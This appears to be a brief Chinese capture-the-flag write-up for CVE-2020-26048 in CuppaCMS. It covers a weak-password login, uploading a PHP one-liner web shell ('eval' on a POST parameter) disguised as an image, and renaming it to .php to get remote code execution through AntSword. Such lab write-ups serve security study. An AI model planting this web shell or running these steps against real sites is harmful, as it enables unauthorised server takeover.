春秋云境CVE-2020-26048

简介

CuppaCMS是一套内容管理系统(CMS)。 CuppaCMS 2019-11-12之前版本存在安全漏洞,攻击者可利用该漏洞在图像扩展内上传恶意文件,通过使用文件管理器提供的重命名函数的自定义请求,可以将图像扩展修改为PHP,从而导致远程任意代码执行。

正文

1.进入靶场

2.弱口令登录admin\admin

3.上传一句话木马图片

复制代码
<?php @eval($_POST['cmd']);?>

4.删除配置文件

5.重命名图片,抓包更改文件后缀

6.蚁剑连接

7.得到flag

相关推荐
shenyan~几秒前
关于 Web 安全:4. 中间件 & 框架风险点分析
前端·安全·中间件
Alfadi联盟 萧瑶1 小时前
Web安全技术体系
安全·web安全
安科瑞刘鸿鹏2 小时前
工商业预付费系统组成架构及系统特点介绍
运维·物联网·安全·架构
Alfadi联盟 萧瑶2 小时前
网络安全从零开始(二):细分技术方向深度解析
安全·web安全
Johny_Zhao5 小时前
Nmap 从入门到精通:详细指南
linux·网络·网络安全·信息安全·云计算·shell·nmap·yum源·系统运维·itsm
Alfadi联盟 萧瑶13 小时前
未来安全与持续进化
安全
SmartSoftHelp开发辅助优化17 小时前
SmartSoftHelp 之 SQL Server 数据库安全备份与安全还原详解---深度优化版:SmartSoftHelp DeepCore XSuite
数据库·安全·oracle
Alfadi联盟 萧瑶18 小时前
安全运营与威胁对抗体系
安全
PrDarcyLuo18 小时前
【IEEE会议推荐】第五届区块链技术与信息安全国际会议
人工智能·安全·网络安全·区块链·信息与通信
zhu620197618 小时前
Android10如何设置ro.debuggable=1?
android·安全·android逆向·android10·ro.debuggable